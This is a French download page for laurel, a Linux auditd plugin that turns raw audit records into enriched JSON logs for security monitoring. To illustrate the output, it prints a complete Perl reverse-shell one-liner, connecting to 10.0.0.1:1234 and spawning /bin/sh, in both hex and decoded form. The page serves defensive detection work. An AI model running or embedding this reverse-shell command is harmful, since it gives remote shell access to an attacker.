Téléchargement laurel - Téléchargement du code source laurel

laurel

Autre code source

v0.6.4

Télécharger

Audit Linux - journalisation utilisable, robuste et facile

Laurel est un plugin post-traitement de l'événement pour AuditD (8) qui génère des journaux d'audit JSON utiles et enrichis adaptés aux configurations de surveillance de la sécurité modernes.

La documentation correspondant à la dernière version stable peut être trouvée ici.

Pourquoi?

TLDR: Au lieu d'événements d'audit qui ressemblent à ça…

 type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

… Laurel les transforme en journaux JSON où le gâchis que les attaquants / testeurs de pénétration / équipes rouges essaient de faire devient apparent à première vue:

 { … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}

Cela se produit à la source car Laurel fonctionne sur l'hôte où les événements d'audit sont générés. Les événements sont enrichis avec des informations utiles sur le processus parent (PPID):

 "PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentation

La configuration et les détails opérationnels sont décrits dans la page manuelle Laurel (8). Des détails sur le format de journal et les justifications peuvent être trouvés dans la page manuelle Laurel-sur (7). La page Laurel-AUDIT-RULES (7) contient des conseils et des exemples de configuration des règles d'audit utiles pour détecter les tactiques des attaquants.

Les instructions d'installation de Laurel contiennent des instructions sur la façon de construire Laruel à partir de la source et comment l'installer et l'installer.

Nous avons développé Laurel parce que nous ne nous sommes pas satisfaits des ensembles de fonctionnalités et des caractéristiques de performance des projets et des produits existants. Veuillez vous référer au document de performance pour plus de détails.